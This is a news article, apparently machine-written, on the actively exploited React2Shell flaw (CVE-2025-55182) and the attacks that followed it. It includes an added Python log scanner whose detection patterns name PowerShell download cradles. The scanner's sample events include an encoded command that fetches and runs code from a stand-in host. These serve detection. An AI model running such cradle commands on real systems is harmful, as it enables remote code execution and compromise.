Ethical Hacking News
A critical React2Shell remote code execution flaw (CVE-2025-55182) has exposed over 77k IP addresses to potential breaches across multiple sectors, with attackers already compromising more than 30 organizations worldwide. To mitigate the damage, developers must update React immediately and rebuild their applications.
The React2Shell flaw is a critical remote code execution vulnerability (CVE-2025-55182) that has been actively exploited by attackers, resulting in breaches of over 30 organizations worldwide. The vulnerability was discovered by security researcher Maple3142 and allows attackers to execute arbitrary commands remotely through unsafe deserialization of client-controlled data inside React Server Components. A total of 77,664 IP addresses have been identified as vulnerable to the React2Shell flaw, with around 23,700 in the United States alone. Attackers have used tactics such as executing PowerShell commands and deploying payloads to gain access to systems, including installing Cobalt Strike beacons and Snowlight malware. Organizations are strongly advised to update their systems immediately and rebuild/redeploy their applications due to the severity of the vulnerability. CISA has added the CVE-2025-55182 flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26th.
The React2Shell flaw, a critical remote code execution vulnerability (CVE-2025-55182), has been actively exploited by attackers, resulting in breaches of over 30 organizations worldwide. According to recent reports, the React team initially disclosed the vulnerability on December 3rd; unsafe deserialization of client-controlled data inside React Server Components enables attackers to execute arbitrary commands remotely.
The React2Shell flaw is particularly concerning due to its potential impact on frameworks like Next.js, which implements the same deserialization logic. The vulnerability was discovered by security researcher Maple3142 who published a working proof-of-concept demonstrating remote command execution against unpatched servers. Since then, automated tools have been used to exploit this flaw with ease.
A total of 77,664 IP addresses have now been identified as vulnerable to the React2Shell flaw, according to reports from the Internet watchdog group Shadowserver. Around 23,700 of these are located in the United States alone, and over 30 organizations across multiple sectors have already been compromised by attackers exploiting this vulnerability.
Attackers have used tactics such as executing PowerShell commands that perform basic math operations to confirm whether a device is vulnerable to the remote code execution flaw. Once confirmed, they run base64-encoded PowerShell scripts directly in memory; these download additional scripts and deploy payloads to extend their access to the system.
Researchers at GreyNoise observed attacks in which threat actors used these tactics to install a Cobalt Strike beacon on compromised devices, giving them a foothold on the network. The malware deployed in these attacks includes Snowlight, a dropper that lets attackers deliver additional payloads, and Vshell, a backdoor commonly used by Chinese hacking groups for remote access and lateral movement within compromised networks.
Due to its severity, numerous companies have rushed to patch their systems and apply mitigations to protect against this critical vulnerability. Yesterday, Cloudflare rolled out emergency detections and rules for the React flaw in its Web Application Firewall (WAF) but inadvertently caused an outage affecting numerous websites before correcting the issues.
Given the widespread exploitation of the CVE-2025-55182 flaw, organizations using React Server Components or frameworks built on top of them are strongly advised to update their systems immediately and rebuild/redeploy their applications. They should also review logs for signs of PowerShell or shell command execution spawned by their application servers, which could indicate a breach.
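One way to act on the log-review advice above, covering the probe-then-encoded-PowerShell pattern described earlier: the following added example (not code from the article or from any vendor it cites) scans constructed process-creation events and flags shell interpreters spawned by a Node.js server process, decoding any -EncodedCommand payload and escalating severity when it contains an in-memory download cradle. The JSON event shape, image names and the sample commands are assumptions made for the example.

```python
import base64
import json
import re

# Indicators of in-memory download-and-execute PowerShell, matched after decoding.
CRADLE_RE = re.compile(r"IEX|Invoke-Expression|DownloadString|WebClient|Invoke-WebRequest|\biwr\b", re.I)
# PowerShell accepts -e, -ec, -enc and -EncodedCommand for base64 (UTF-16LE) scripts.
ENCODED_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
NODE_IMAGES = ("node", "node.exe", "next-server")              # assumed server process names
SHELL_IMAGES = ("powershell.exe", "pwsh", "pwsh.exe", "sh", "bash", "cmd.exe")

def _basename(path):
    """Strip either Windows or POSIX directory components."""
    return path.rsplit("/", 1)[-1].rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_event(event):
    """Score one process-creation event; returns (severity, reason) or None if benign."""
    if _basename(event["parent"]) not in NODE_IMAGES or _basename(event["image"]) not in SHELL_IMAGES:
        return None
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None and CRADLE_RE.search(decoded):
        return ("high", "node spawned encoded PowerShell containing a download/IEX cradle")
    if decoded is not None:
        return ("medium", "node spawned encoded PowerShell")
    return ("low", "node spawned a shell interpreter (possible vulnerability probe)")

def scan_log(lines):
    """Run classify_event over JSON log lines; returns a list of (line_index, severity, reason)."""
    hits = []
    for i, line in enumerate(lines):
        verdict = classify_event(json.loads(line))
        if verdict:
            hits.append((i, *verdict))
    return hits

def _enc(script):
    """Build a PowerShell-style base64 (UTF-16LE) payload; used only for the constructed samples."""
    return base64.b64encode(script.encode("utf-16le")).decode()

# Constructed sample events: an encoded download cradle, a plain math probe, and a benign cron job.
SAMPLE_LOG = [
    json.dumps({"parent": "/usr/bin/node", "image": "/usr/bin/pwsh",
                "cmdline": "pwsh -NoP -enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')")}),
    json.dumps({"parent": "C:\\Program Files\\nodejs\\node.exe",
                "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "cmdline": "powershell.exe -c 7*191"}),
    json.dumps({"parent": "/usr/sbin/cron", "image": "/bin/sh", "cmdline": "sh -c /opt/backup.sh"}),
]

if __name__ == "__main__":
    for index, severity, reason in scan_log(SAMPLE_LOG):
        print(f"event {index}: {severity.upper()} - {reason}")
```

Real deployments would feed Sysmon Event ID 1 or auditd execve records into scan_log after mapping them to the same three fields.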
CISA has added the CVE-2025-55182 flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26th under Binding Operational Directive 22-01. Organizations must therefore prioritize patching their systems and taking necessary security measures to protect against potential attacks.
The researchers identified vulnerable IP addresses by sending an HTTP request to servers and checking for a specific response that confirms the flaw is present. GreyNoise also recorded over 181 distinct IP addresses attempting to exploit this vulnerability within the past 24 hours, most of them apparently automated.
These scans originated primarily from China, Hong Kong, the Netherlands and several other countries. The rush to patch reflects organizations seeking proactive measures against this critical vulnerability.
Related Information:
https://www.ethicalhackingnews.com/articles/React2Shell-Flaw-A-Critical-Vulnerability-Exposed-to-Breaches-of-30-Orgs-and-77k-IP-Addresses-ehn.shtml
Published: Sat Dec 6 13:19:13 2025 by llama3.2 3B Q4_K_M